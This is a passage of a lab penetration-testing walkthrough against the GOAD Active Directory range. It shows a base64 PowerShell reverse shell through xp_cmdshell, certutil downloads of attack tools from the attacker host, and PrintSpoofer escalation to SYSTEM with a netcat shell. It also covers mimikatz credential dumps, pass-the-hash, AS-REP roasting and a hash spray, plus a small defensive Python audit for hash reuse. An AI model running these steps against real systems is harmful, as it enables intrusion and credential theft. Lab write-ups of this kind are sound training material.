    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host noprefixroute
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:c7:e1:36 brd ff:ff:ff:ff:ff:ff
    inet 10.0.2.15/24 brd 10.0.2.255 scope global dynamic noprefixroute eth0
       valid_lft 72631sec preferred_lft 72631sec
    inet6 fe80::e4c7:3d51:e066:24c9/64 scope link noprefixroute
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
    link/ether 08:00:27:58:30:f4 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.104/24 brd 192.168.56.255 scope global dynamic noprefixroute eth1
       valid_lft 334sec preferred_lft 334sec
    inet6 fe80::5af0:79:dd52:80d1/64 scope link noprefixroute
       valid_lft forever preferred_lft forever

┌──(kali㉿kali)-[~/goad/castelblack]
└─$ rlwrap nc -lvnp 443
Next, enable xp_cmdshell from the MSSQL prompt and launch the reverse shell:
SQL (NORTH\jon.snow  dbo@master)> sp_configure 'show advanced options', '1'
[*] INFO(CASTELBLACK\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (NORTH\jon.snow  dbo@master)> reconfigure
SQL (NORTH\jon.snow  dbo@master)> sp_configure 'xp_cmdshell', 1
[*] INFO(CASTELBLACK\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (NORTH\jon.snow  dbo@master)> reconfigure
SQL (NORTH\jon.snow  dbo@master)> xp_cmdshell powershell -e +ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIArACAAIgBQAFMAIAAiACAAKwA gACgAcAB3AGQAKQAuAFAAYQB0AGgAIArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwB DAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAA sACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=
The listener receives the callback:
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.22] 55053
PS C:\Windows\system32>
Let's look at the privileges of this shell:
PS C:\Windows\system32> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
PS C:\Windows\system32>
SeImpersonatePrivilege is enabled. That is expected: xp_cmdshell runs under the SQL Server service account, and service accounts normally hold this privilege. It is exactly what PrintSpoofer abuses to get a SYSTEM token, so let's use it: https://github.com/itm4n/PrintSpoofer
First, we need to transfer PrintSpoofer (and nc.exe) to CASTELBLACK.
┌──(kali㉿kali)-[~/goad/castelblack]
└─$ ls
castelblack.nmap  mimikatz.exe  nc.exe  powerview.ps1  PrintSpoofer64.exe  SharpHound.exe  SharpHound.ps1

┌──(kali㉿kali)-[~/goad/castelblack]
└─$ python2 -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
(I'm running it with Python 2 because the built-in HTTP server in Python 3 didn't work properly.)
On the CASTELBLACK side, change to C:\tmp (in PowerShell, /tmp resolves to that directory on the current drive) and use it to stage the tools, fetching them with certutil:
PS C:\Windows\system32> cd /tmp
PS C:\tmp> certutil -urlcache -split -f http://192.168.56.104:8080/nc.exe
****  Online  ****
  0000  ...
  e800
CertUtil: -URLCache command completed successfully.
PS C:\tmp> certutil -urlcache -split -f http://192.168.56.104:8080/PrintSpoofer64.exe
****  Online  ****
  0000  ...
  6a00
CertUtil: -URLCache command completed successfully.
On the Kali side, start a second listener:
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 80
listening on [any] 80 ...
Run PrintSpoofer from the MSSQL shell, telling it to launch nc.exe with a PowerShell reverse shell back to the listener:
PS C:\tmp> .\PrintSpoofer64.exe -i -c ".\nc.exe 192.168.56.104 80 -e powershell"
A new shell comes back as NT AUTHORITY\SYSTEM, as whoami confirms, and every privilege is now enabled:
┌──(kali㉿kali)-[~]
└─$ rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.56.104] from (UNKNOWN) [192.168.56.22] 55063
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Windows\system32> whoami
whoami
nt authority\system
PS C:\Windows\system32> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                            Description                                                        State
========================================= ================================================================== =======
SeCreateTokenPrivilege                    Create a token object                                              Enabled
SeAssignPrimaryTokenPrivilege             Replace a process level token                                      Enabled
SeLockMemoryPrivilege                     Lock pages in memory                                               Enabled
SeIncreaseQuotaPrivilege                  Adjust memory quotas for a process                                 Enabled
SeTcbPrivilege                            Act as part of the operating system                                Enabled
SeSecurityPrivilege                       Manage auditing and security log                                   Enabled
SeTakeOwnershipPrivilege                  Take ownership of files or other objects                           Enabled
SeLoadDriverPrivilege                     Load and unload device drivers                                     Enabled
SeSystemProfilePrivilege                  Profile system performance                                         Enabled
SeSystemtimePrivilege                     Change the system time                                             Enabled
SeProfileSingleProcessPrivilege           Profile single process                                             Enabled
SeIncreaseBasePriorityPrivilege           Increase scheduling priority                                       Enabled
SeCreatePagefilePrivilege                 Create a pagefile                                                  Enabled
SeCreatePermanentPrivilege                Create permanent shared objects                                    Enabled
SeBackupPrivilege                         Back up files and directories                                      Enabled
SeRestorePrivilege                        Restore files and directories                                      Enabled
SeShutdownPrivilege                       Shut down the system                                               Enabled
SeDebugPrivilege                          Debug programs                                                     Enabled
SeAuditPrivilege                          Generate security audits                                           Enabled
SeSystemEnvironmentPrivilege              Modify firmware environment values                                 Enabled
SeChangeNotifyPrivilege                   Bypass traverse checking                                           Enabled
SeUndockPrivilege                         Remove computer from docking station                               Enabled
SeManageVolumePrivilege                   Perform volume maintenance tasks                                   Enabled
SeImpersonatePrivilege                    Impersonate a client after authentication                          Enabled
SeCreateGlobalPrivilege                   Create global objects                                              Enabled
SeTrustedCredManAccessPrivilege           Access Credential Manager as a trusted caller                      Enabled
SeRelabelPrivilege                        Modify an object label                                             Enabled
SeIncreaseWorkingSetPrivilege             Increase a process working set                                     Enabled
SeTimeZonePrivilege                       Change the time zone                                               Enabled
SeCreateSymbolicLinkPrivilege             Create symbolic links                                              Enabled
SeDelegateSessionUserImpersonatePrivilege Obtain an impersonation token for another user in the same session Enabled
Next, transfer mimikatz.
First, make mimikatz available over HTTP from the attacker's machine (Kali ships a copy under /usr/share/windows-resources/mimikatz):
┌──(kali㉿kali)-[~/goad/castelblack]
└─$ cp /usr/share/windows-resources/mimikatz/x64/mimikatz.exe .

┌──(kali㉿kali)-[~/goad/castelblack]
└─$ python2 -m SimpleHTTPServer 8080
Serving HTTP on 0.0.0.0 port 8080 ...
Download it from the SYSTEM shell on the target:
PS C:\Windows\system32> certutil -urlcache -split -f http://192.168.56.104:8080/mimikatz.exe
certutil -urlcache -split -f http://192.168.56.104:8080/mimikatz.exe
****  Online  ****
  000000  ...
  14ae00
CertUtil: -URLCache command completed successfully.
Then dump the local SAM and the LSA secrets:
PS C:\Windows\system32> ./mimikatz.exe
./mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # lsadump::sam
Domain : CASTELBLACK
SysKey : e726c3449239522103313bbfa17ae832
Local SID : S-1-5-21-4014308955-3248381926-711700073

SAMKey : 8ba6eb6e2d70bd1eac7ec4298c16ca0d

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: dbd13e1c4e338284ac4e9874f7de6ef4

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 3657700679fd58e85736b18c734f2374

* Primary:Kerberos-Newer-Keys *
    Default Salt : VAGRANTAdministrator
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : e7aa0f8a649aa96fab5ed9e65438392bfc549cb2695ac4237e97996823619972
      aes128_hmac       (4096) : bb7b6aed58a7a395e0e674ac76c28aa0
      des_cbc_md5       (4096) : fe58cdcd13a43243
    OldCredentials
      aes256_hmac       (4096) : 05ebd58ad12ff00465687ed1e33e4631c4739859f369ae36a7f6fccbe795fb78
      aes128_hmac       (4096) : 778a45f4f133513b831ce562570ac6af
      des_cbc_md5       (4096) : 58bf1ff4c4f4b0f2
    OlderCredentials
      aes256_hmac       (4096) : aa3c962519c1e2dee9ffb53df04325424f812bba47279767ad25eaccffd18695
      aes128_hmac       (4096) : 2f72e6aa959c5ea08e11deabfce6ed55
      des_cbc_md5       (4096) : 62bf012513ea8c0e

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : VAGRANTAdministrator
    Credentials
      des_cbc_md5       : fe58cdcd13a43243
    OldCredentials
      des_cbc_md5       : 58bf1ff4c4f4b0f2

RID  : 000001f5 (501)
User : Guest

RID  : 000001f7 (503)
User : DefaultAccount

RID  : 000001f8 (504)
User : WDAGUtilityAccount
  Hash NTLM: 4363b6dc0c95588964884d7e1dfea1f7

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 03a659ee63caba3a4abb578087d86a35

* Primary:Kerberos-Newer-Keys *
    Default Salt : WDAGUtilityAccount
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : e2d64d3002108324d20638239c935473767a9d7ed14d3fbfdfb9dca09b0ca43c
      aes128_hmac       (4096) : 81a21c239b02db38b36589af9ca027a5
      des_cbc_md5       (4096) : d33ba768d95dc257

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : WDAGUtilityAccount
    Credentials
      des_cbc_md5       : d33ba768d95dc257

RID  : 000003e8 (1000)
User : vagrant
  Hash NTLM: e02bc503339d51f71d913c245d35b50b

Supplemental Credentials:
* Primary:NTLM-Strong-NTOWF *
    Random Value : 503d6e8e5de1854c6257b711e268fe30

* Primary:Kerberos-Newer-Keys *
    Default Salt : VAGRANT-2019vagrant
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : aa97635c942315178db04791ffa240411c36963b5a5e775e785c6bd21dd11c24
      aes128_hmac       (4096) : 0d7c6160ffb016857b9af96c44110ab1
      des_cbc_md5       (4096) : 16dc9e8ad3dfc47f

* Packages *
    NTLM-Strong-NTOWF

* Primary:Kerberos *
    Default Salt : VAGRANT-2019vagrant
    Credentials
      des_cbc_md5       : 16dc9e8ad3dfc47f

mimikatz #
mimikatz # lsadump::secrets
Domain : CASTELBLACK
SysKey : e726c3449239522103313bbfa17ae832

Local name : CASTELBLACK ( S-1-5-21-4014308955-3248381926-711700073 )
Domain name : NORTH ( S-1-5-21-2343606889-1312097775-3500245986 )
Domain FQDN : north.sevenkingdoms.local

Policy subsystem is : 1.18
LSA Key(s) : 1, default {f577e818-b2ae-c757-1ce1-c340c37c62df}
  [00] {f577e818-b2ae-c757-1ce1-c340c37c62df} 0ba3686dd3c0e1bc912fad05b7544d38a2c57ffe99ae0282cde6eb1553647a56

Secret  : $MACHINE.ACC
cur/hex : 11 11 80 6e 0b f8 db 39 1c b1 c0 2c 64 11 c3 4b ce 4b 04 22 53 b8 62 a6 ba a7 4e 0a 76 54 78 09 99 ff 01 c1 d5 3d 59 8e d0 8f 16 8c 35 ca 13 30 35 83 a2 33 43 a9 65 fa 4b 8f 72 af df b6 33 71 b8 f3 d6 ae b4 5d 7e 1e 3c 3f 91 d4 f1 ee a5 97 7a 41 03 0a 4e 83 60 3b 6c 4d 78 db 03 72 8b c7 9b 04 1b 02 fc 53 94 3f 14 ce 01 4e d7 fa 7c 33 5c 7e 15 04 67 b8 db a0 02 32 56 d6 f3 76 15 0c 45 c7 bd e0 63 5e 2d 1e d5 38 48 68 5f 8a dd d1 00 82 7f 32 0d 24 d0 ca 91 02 a6 ca 78 24 ec c7 99 4f 0e d4 33 c3 25 a7 e7 2d 20 96 0c e3 79 75 70 27 22 18 fb fb 88 68 fb a0 03 7a ce 07 45 9c 34 eb 05 cf 05 c0 0b 9a 78 08 26 76 e4 5a 12 83 da 88 77 2c b7 88 1a 96 31 29 98 f4 9b 2b 92 a4 57 5a 46 be 4a 2d 83 9a 0e fd 7d 6f 5d 0b 30 f0
    NTLM:20425334e9f78d883485696487ab1b67
    SHA1:8f582df44ed1c9e9c9d26be730c0b99226271cf4
old/text: Ne[&3Mqp!):;U8#4v*-RfAP_\r"g$aYuI UHU1ULGN>Sk:%(qp pLyzv(c+:ymAFVzKUhMjT5>)n0&x.:nEB6?vEv8G0SqH;z<uZ]08>6.rR2d-,8N%oN0a
    NTLM:f2128cf1b7f7b8aba5ba5e2bc89b9439
    SHA1:dd3838e03f855224da1aed2ceb1a0cdcfa4a352b

Secret  : DefaultPassword
old/text: vagrant

Secret  : DPAPI_SYSTEM
cur/hex : 01 00 00 00 13 08 72 a1 a2 43 87 df 59 aa e0 5e 7d 4c a0 c9 8d d5 53 5d 86 a5 36 90 af 0f cd 44 90 28 0e de 09 9b c6 84 e1 1a 69 18
    full: 130872a1a24387df59aae05e7d4ca0c98dd5535d86a53690af0fcd4490280ede099bc684e11a6918
    m/u : 130872a1a24387df59aae05e7d4ca0c98dd5535d / 86a53690af0fcd4490280ede099bc684e11a6918
old/hex : 01 00 00 00 f8 8a ba f4 5d f8 7a f3 1f 7a 1f 2d 8f c0 48 de 9f 8c a8 77 c0 90 ca 12 69 d8 47 13 c9 de 69 bc 50 3e ae 27 c6 ea 74 26
    full: f88abaf45df87af31f7a1f2d8fc048de9f8ca877c090ca1269d84713c9de69bc503eae27c6ea7426
    m/u : f88abaf45df87af31f7a1f2d8fc048de9f8ca877 / c090ca1269d84713c9de69bc503eae27c6ea7426

Secret  : NL$KM
cur/hex : 22 34 01 76 01 70 30 93 88 a7 6b b2 87 43 59 69 0e 41 bd 22 0a 0c cc 23 3a 5b b6 74 cb 90 d6 35 14 ca d8 45 4a f0 db 72 d5 cf 3b a1 ed 7f 3a 98 cd 4d d6 36 6a 35 24 2d a0 eb 0f 8e 3f 52 81 c9
old/hex : 22 34 01 76 01 70 30 93 88 a7 6b b2 87 43 59 69 0e 41 bd 22 0a 0c cc 23 3a 5b b6 74 cb 90 d6 35 14 ca d8 45 4a f0 db 72 d5 cf 3b a1 ed 7f 3a 98 cd 4d d6 36 6a 35 24 2d a0 eb 0f 8e 3f 52 81 c9

Secret  : _SC_MSSQL$SQLEXPRESS / service 'MSSQL$SQLEXPRESS' with username : north.sevenkingdoms.local\sql_svc
cur/text: YouWillNotKerboroast1ngMeeeeee

Secret  : _SC_SQLTELEMETRY$SQLEXPRESS / service 'SQLTELEMETRY$SQLEXPRESS' with username : NT Service\SQLTELEMETRY$SQLEXPRESS

mimikatz #
Now that we have successfully obtained the authentication information, let’s try logging in using Pass-the-hash.
┌──(kali㉿kali)-[~] └─$ evil-winrm -u Administrator -H dbd13e1c4e338284ac4e9874f7de6ef4 -i castelblack Evil-WinRM shell v3.5 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents>
I was able to obtain Administrator privileges for CASTELBLACK.
Winterfell walkthrough (administrator privileges)
Check which users in north.sevenkingdoms.local do not require Kerberos pre-authentication.
┌──(kali㉿kali)-[~/goad/winterfell] └─$ impacket-GetNPUsers north.sevenkingdoms.local/ -no-pass -usersfile users.txt Impacket v0.12.0.dev1 - Copyright 2023 Fortra [-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User arya.stark doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL:35976c73e5060906dab8147e5b1d2744$ [-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database) [-] User eddard.stark doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] User hodor doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User jeor.mormont doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User jon.snow doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] User rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User robb.stark doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User samwell.tarly doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User sansa.stark doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
I got brandon.stark’s AS-REP hash ($krb5asrep$), so I’ll try cracking it with john.
┌──(kali㉿kali)-[~/goad/winterfell] └─$ john --wordlist=/usr/share/wordlists/rockyou.txt brandon.stark.krb5asrep.hash Using default input encoding: UTF-8 Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status iseedeadpeople ($krb5asrep$23$brandon.stark@NORTH.SEVENKINGDOMS.LOCAL) 1g 0:00:00:00 DONE (2024-10-11 22:46) 5.555g/s 301511p/s 301511c/s 301511C/s soydivina..250984 Use the "--show" option to display all of the cracked passwords reliably Session completed.
I obtained the credentials brandon.stark/iseedeadpeople.
Now that we have credentials for a user in the north.sevenkingdoms.local domain, let’s use them to run BloodHound collection.
Add the domain controller as a name server in resolv.conf (the -ns flag of bloodhound-python should work too).
┌──(kali㉿kali)-[~/goad/winterfell/bloodhound] └─$ cat /etc/resolv.conf # Generated by NetworkManager nameserver 10.0.2.3 nameserver 192.168.56.10
Run bloodhound-python.
┌──(kali㉿kali)-[~/goad/winterfell/bloodhound] └─$ bloodhound-python --zip -c All -d north.sevenkingdoms.local -u brandon.stark -p iseedeadpeople -dc winterfell.north.sevenkingdoms.local INFO: Found AD domain: north.sevenkingdoms.local WARNING: Could not find a global catalog server, assuming the primary DC has this role If this gives errors, either specify a hostname with -gc or disable gc resolution with --disable-autogc INFO: Getting TGT for user INFO: Connecting to LDAP server: winterfell.north.sevenkingdoms.local INFO: Found 1 domains INFO: Found 2 domains in the forest INFO: Found 2 computers INFO: Connecting to GC LDAP server: winterfell.north.sevenkingdoms.local INFO: Connecting to LDAP server: winterfell.north.sevenkingdoms.local INFO: Found 17 users INFO: Found 51 groups INFO: Found 3 gpos INFO: Found 1 ous INFO: Found 19 containers INFO: Found 1 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: castelblack.north.sevenkingdoms.local INFO: Querying computer: winterfell.north.sevenkingdoms.local INFO: Done in 00M 00S INFO: Compressing output into 20241011225036_bloodhound.zip
We were able to obtain the information. We will continue to obtain information on other domains in this manner.
┌──(kali㉿kali)-[~/goad/winterfell/bloodhound] └─$ bloodhound-python --zip -c All -d sevenkingdoms.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc kingslanding.sevenkingdoms.local INFO: Found AD domain: sevenkingdoms.local INFO: Getting TGT for user INFO: Connecting to LDAP server: kingslanding.sevenkingdoms.local INFO: Found 1 domains INFO: Found 2 domains in the forest INFO: Found 1 computers INFO: Connecting to LDAP server: kingslanding.sevenkingdoms.local INFO: Found 16 users INFO: Found 59 groups INFO: Found 2 gpos INFO: Found 9 ous INFO: Found 19 containers INFO: Found 2 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: kingslanding.sevenkingdoms.local INFO: Done in 00M 00S INFO: Compressing output into 20241011225327_bloodhound.zip
Next is essos.local.
┌──(kali㉿kali)-[~/goad/winterfell/bloodhound] └─$ bloodhound-python --zip -c All -d essos.local -u brandon.stark@north.sevenkingdoms.local -p iseedeadpeople -dc meereen.essos.local INFO: Found AD domain: essos.local INFO: Getting TGT for user INFO: Connecting to LDAP server: meereen.essos.local INFO: Found 1 domains INFO: Found 1 domains in the forest INFO: Found 2 computers INFO: Connecting to LDAP server: meereen.essos.local INFO: Found 14 users INFO: Found 59 groups INFO: Found 3 gpos INFO: Found 2 ous INFO: Found 19 containers INFO: Found 1 trusts INFO: Starting computer enumeration with 10 workers INFO: Querying computer: braavos.essos.local INFO: Querying computer: meereen.essos.local INFO: Done in 00M 00S INFO: Compressing output into 20241011225440_bloodhound.zip
That gives three BloodHound result archives.
Loading them into BloodHound displays the relationships nicely.


We can see that the Administrator password is reused in Winterfell.
┌──(kali㉿kali)-[~] └─$ nxc winrm 192.168.56.10-12 192.168.56.22-23 -u Administrator -H 'dbd13e1c4e338284ac4e9874f7de6ef4' WINRM 192.168.56.10 5985 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 (name:KINGSLANDING) (domain:sevenkingdoms.local) WINRM 192.168.56.12 5985 MEEREEN [*] Windows 10 / Server 2016 Build 14393 (name:MEEREEN) (domain:essos.local) WINRM 192.168.56.23 5985 BRAAVOS [*] Windows 10 / Server 2016 Build 14393 (name:BRAAVOS) (domain:essos.local) WINRM 192.168.56.11 5985 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 (name:WINTERFELL) (domain:north.sevenkingdoms.local) WINRM 192.168.56.22 5985 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) WINRM 192.168.56.10 5985 KINGSLANDING [-] kingdoms.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 WINRM 192.168.56.12 5985 MEEREEN [-] essos.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 WINRM 192.168.56.23 5985 BRAAVOS [-] essos.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 WINRM 192.168.56.11 5985 WINTERFELL [+] north.sevenkingdoms.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!) WINRM 192.168.56.22 5985 CASTELBLACK [+] north.sevenkingdoms.local\Administrator:dbd13e1c4e338284ac4e9874f7de6ef4 (Pwn3d!) Running nxc against 5 targets ━━━━━━━━━━━━━━━━━━━━ ━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
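The spray above shows a single local Administrator hash that is valid on two hosts. As an added example that is not part of the original post, the Python audit below takes SAM dumps in secretsdump’s pwdump format and reports NT hashes shared across hosts, which is exactly the reuse that LAPS is meant to remove; the sample lines are constructed to mirror the spray result (the BRAAVOS Administrator hash is made up).

```python
from collections import defaultdict

# Well-known hashes of the empty password; accounts carrying these hold no usable secret.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# Constructed SAM dumps in secretsdump's pwdump format (user:rid:lmhash:nthash:::),
# one list per host. CASTELBLACK/WINTERFELL mirror the reuse shown above; the
# BRAAVOS Administrator hash is made up to represent a host with a unique password.
SAM_DUMPS = {
    "CASTELBLACK": [
        "Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::",
        "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
        "vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::",
    ],
    "WINTERFELL": [
        "Administrator:500:aad3b435b51404eeaad3b435b51404ee:dbd13e1c4e338284ac4e9874f7de6ef4:::",
        "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
        "vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::",
    ],
    "BRAAVOS": [
        # constructed, unique hash
        "Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::",
        "Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::",
        "vagrant:1000:aad3b435b51404eeaad3b435b51404ee:e02bc503339d51f71d913c245d35b50b:::",
    ],
}


def parse_pwdump(line):
    """Split one pwdump line into (user, rid, lmhash, nthash)."""
    user, rid, lm, nt = line.strip().split(":")[:4]
    return user, int(rid), lm.lower(), nt.lower()


def find_reused_hashes(dumps):
    """Return {nthash: [(host, user, rid), ...]} for every non-empty NT hash that
    appears on more than one host, i.e. the same password set on several machines."""
    seen = defaultdict(list)
    for host, lines in dumps.items():
        for line in lines:
            user, rid, _lm, nt = parse_pwdump(line)
            if nt == EMPTY_NT:
                continue  # blank password (typically a disabled built-in), not reuse
            seen[nt].append((host, user, rid))
    return {nt: hits for nt, hits in seen.items()
            if len({host for host, _, _ in hits}) > 1}


def shared_builtin_admin(dumps):
    """Hosts whose RID-500 account shares an NT hash: the case LAPS exists to prevent.
    Any one of these hosts being compromised hands out local admin on all the others."""
    groups = defaultdict(list)
    for nt, hits in find_reused_hashes(dumps).items():
        for host, _user, rid in hits:
            if rid == 500:
                groups[nt].append(host)
    return {nt: sorted(hosts) for nt, hosts in groups.items() if len(hosts) > 1}


if __name__ == "__main__":
    for nt, hosts in shared_builtin_admin(SAM_DUMPS).items():
        print(f"built-in Administrator hash {nt} shared by: {', '.join(hosts)}")
    for nt, hits in find_reused_hashes(SAM_DUMPS).items():
        print(nt, "->", [f"{h}\\{u} (RID {r})" for h, u, r in hits])
```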
That being said, let’s explore other authentication routes.
Gather the hosts that do not require SMB signing, the prerequisite for an NTLM relay attack.
┌──(kali㉿kali)-[~/goad] └─$ nxc smb 192.168.56.10-23 --gen-relay-list relay.txt SMB 192.168.56.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False) SMB 192.168.56.12 445 MEEREEN [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True) SMB 192.168.56.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False) SMB 192.168.56.23 445 BRAAVOS [*] Windows Server 2016 Standard Evaluation 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True) SMB 192.168.56.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False) Running nxc against 14 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00 ┌──(kali㉿kali)-[~/goad] └─$ cat relay.txt 192.168.56.23 192.168.56.22
Since we now have the hosts that do not require SMB signing, it looks like NTLM authentication can be relayed to them.
Change the Responder configuration to turn off its HTTP and SMB servers, since ntlmrelayx will listen on those.
┌──(kali㉿kali)-[~/goad]
└─$ sudo sed -i 's/HTTP = On/HTTP = Off/g' /etc/responder/Responder.conf && sudo cat /etc/responder/Responder.conf | grep --color=never 'HTTP ='
HTTP = Off
┌──(kali㉿kali)-[~/goad]
└─$ sudo sed -i 's/SMB = On/SMB = Off/g' /etc/responder/Responder.conf && sudo cat /etc/responder/Responder.conf | grep --color=never 'SMB ='
SMB = Off
Start ntlmrelayx.
